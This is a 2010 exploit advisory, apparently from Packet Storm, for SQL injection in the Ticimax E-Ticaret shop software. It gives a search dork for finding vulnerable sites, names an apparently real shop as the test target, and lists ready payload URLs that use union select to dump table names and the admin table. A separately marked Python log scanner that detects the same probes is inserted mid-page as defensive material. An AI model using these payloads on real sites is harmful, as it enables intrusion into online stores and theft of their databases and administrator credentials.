Ticimax E-Ticaret SQL Injection

2010-06-02T00:00:00
ID PACKETSTORM:90188
Type packetstorm
Reporter Neuromancer
Modified 2010-06-02T00:00:00

Description

# Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]  
# Date: [01.06.2010]  
# Author: [Neuromancer]  
# Version: [app version]  
# Tested on: [http://www.adidasnet.com/kategori.asp?id=-38+union+select+0,group_concat%28table_name%29,2,3,4+from+information_schema.tables]  
# CVE : [if exists]  
# Code : [exploit code]   
  
  
#####################  
# Author: [Neuromancer]  
# contact : msn[at]neurom4ncer[dot]com  
# From : TURKEY  
#####################  
  
  
Ticimax E-Ticaret (Kategori.asp, urun_detay.asp) Local SQL Injection Vulnerability  
  
Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"  
  
  
======================================================================  
  
--=[ Vuln C0de ]=-  
  
[-] localhost/kategori.asp?id='  
[-] localhost/urun_detay.asp?id='  
  
http://[Site].com/kategori.asp?id=1 order by 1  
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables  
  
or  
  
http://[Site].com/kategori.asp?id=1 union select * from admin  
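Added defensive example, not part of the advisory: a small Python scanner that reads constructed IIS W3C log lines and flags requests to the two scripts named above whose `id` parameter is not a plain integer, using the probe shapes shown on this page (quote, `order by`, `union select`, `information_schema`) as its patterns. The field order in `SAMPLE_LOG` and the sample lines themselves are assumptions.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import parse_qs

# Constructed IIS W3C extended log excerpt (not from any real server); the
# request lines mirror the probe and union/select shapes shown in the advisory.
SAMPLE_LOG = """\
#Fields: date time cs-uri-stem cs-uri-query c-ip sc-status
2010-06-01 10:00:01 /kategori.asp id=38 203.0.113.5 200
2010-06-01 10:00:07 /kategori.asp id=1+order+by+1 198.51.100.9 200
2010-06-01 10:00:12 /kategori.asp id=-38+union+select+0,group_concat%28table_name%29,2,3,4+from+information_schema.tables 198.51.100.9 200
2010-06-01 10:00:20 /urun_detay.asp id=' 198.51.100.9 500
2010-06-01 10:00:31 /urun_detay.asp id=120 203.0.113.5 200
2010-06-01 10:00:40 /index.asp - 203.0.113.5 200
"""

# The two scripts named in the advisory; both expect a numeric id.
VULNERABLE_PAGES = {"/kategori.asp", "/urun_detay.asp"}
SQL_KEYWORDS = re.compile(r"(union\s+select|order\s+by|information_schema|group_concat)", re.I)

def classify_id(value: str) -> Optional[str]:
    """Reason the id value is suspicious, or None when it is a plain integer."""
    if re.fullmatch(r"-?\d+", value):
        return None
    if "'" in value:
        return "quote character in id"
    m = SQL_KEYWORDS.search(value)
    if m:
        return "sql keyword: " + " ".join(m.group(1).lower().split())
    return "non-numeric id"

def scan_iis_log(text: str) -> list:
    """One finding per request to a vulnerable script whose id is not numeric."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, time, stem, query, client_ip, _status = line.split(" ", 5)
        if stem.lower() not in VULNERABLE_PAGES or query == "-":
            continue
        # parse_qs undoes '+' and %xx encoding, so keywords are matched after decoding
        for value in parse_qs(query).get("id", []):
            reason = classify_id(value)
            if reason:
                findings.append({"time": time, "page": stem, "src": client_ip, "reason": reason})
    return findings

def sources_by_hits(findings: list) -> Counter:  # findings per source address
    return Counter(f["src"] for f in findings)
```

Calling `scan_iis_log(SAMPLE_LOG)` on the constructed excerpt yields three findings, all from the same source address, which is the signal a defender would alert on.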
  
=========================| -=[ Attackerz Crew co. ]=- |=========================  
  
Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR  
  
  